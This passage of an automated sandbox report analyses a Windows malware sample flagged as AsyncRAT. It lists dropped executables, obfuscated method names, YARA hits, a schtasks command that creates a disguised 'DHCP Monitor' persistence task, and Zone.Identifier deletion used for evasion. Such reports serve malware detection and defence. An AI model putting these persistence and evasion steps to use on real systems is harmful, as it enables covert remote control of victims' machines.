            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004761F8 push 0047623Bh; ret 4_2_00476233
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0049419C push 004941CFh; ret 4_2_004941C7
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042E1BC push 0042E1E8h; ret 4_2_0042E1E0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00480210 push 0048023Ch; ret 4_2_00480234
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004842DC push 00484308h; ret 4_2_00484300
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0048036C push 00480398h; ret 4_2_00480390
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042C3D0 push 0042C3FCh; ret 4_2_0042C3F4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00432468 push 004324B4h; ret 4_2_004324AC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00486408 push 004864ADh; ret 4_2_004864A5
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0047C404 push 0047C430h; ret 4_2_0047C428
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00432404 push 00432447h; ret 4_2_0043243F
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004324C0 push 0043250Bh; ret 4_2_00432503
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042C4C4 push 0042C4F0h; ret 4_2_0042C4E8
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004464FC push 00446562h; ret 4_2_0044655A
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00490554 push 00490580h; ret 4_2_00490578
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0047A514 push 0047A540h; ret 4_2_0047A538
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00432518 push 00432544h; ret 4_2_0043253C
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00496530 push 00496586h; ret 4_2_0049657E
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0048859C push 004885DEh; ret 4_2_004885D6
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00432650 push 004326C6h; ret 4_2_004326BE
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0049A6BC push 0049A745h; ret 4_2_0049A73D
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00480744 push 00480770h; ret 4_2_00480768
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0049A750 push 0049A776h; ret 4_2_0049A76E
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,4_2_004730FC
            Source: WINDOWS.EXE.6.drStatic PE information: real checksum: 0x0 should be: 0xff011
            Source: y8kdmHi6x3.exeStatic PE information: real checksum: 0x0 should be: 0x2013d1
            Source: Synaptics.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x2013d1
            Source: SYSTEM32.EXE.6.drStatic PE information: real checksum: 0x0 should be: 0x10e22
            Source: ._cache_WINDOWS.EXE.9.drStatic PE information: real checksum: 0x0 should be: 0x38554
            Source: ._cache_y8kdmHi6x3.exe.4.drStatic PE information: real checksum: 0x1c288 should be: 0x11595d
            Source: initial sampleStatic PE information: section name: .text entropy: 7.99980395725
            Source: initial sampleStatic PE information: section name: .text entropy: 7.99980395725
            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

            Persistence and Installation Behavior

            barindex
            Drops PE files to the document folder of the user
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BNAGMGSPLO\~$cache1Jump to dropped file
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BNAGMGSPLO\~$cache1Jump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exeJump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCX831F.tmpJump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BNAGMGSPLO\~$cache1Jump to dropped file
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeJump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Desktop\y8kdmHi6x3.exeJump to dropped file
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeFile created: C:\Users\user\Desktop\WINDOWS.EXEJump to dropped file
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeFile created: C:\Users\user\Desktop\SYSTEM32.EXEJump to dropped file
            Source: C:\Users\user\Desktop\WINDOWS.EXEFile created: C:\Users\user\Desktop\._cache_WINDOWS.EXEJump to dropped file
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCX788E.tmpJump to dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Desktop\._cache_Synaptics.exeJump to dropped file

            Boot Survival

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3fef190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3e27d70.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.46e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000000.426967542.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000000.403770740.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.442628618.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.413670718.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.425456929.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000000.395835615.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEFile opened: C:\Users\user\Desktop\._cache_WINDOWS.EXE:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,4_2_00459934
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,4_2_0045A054
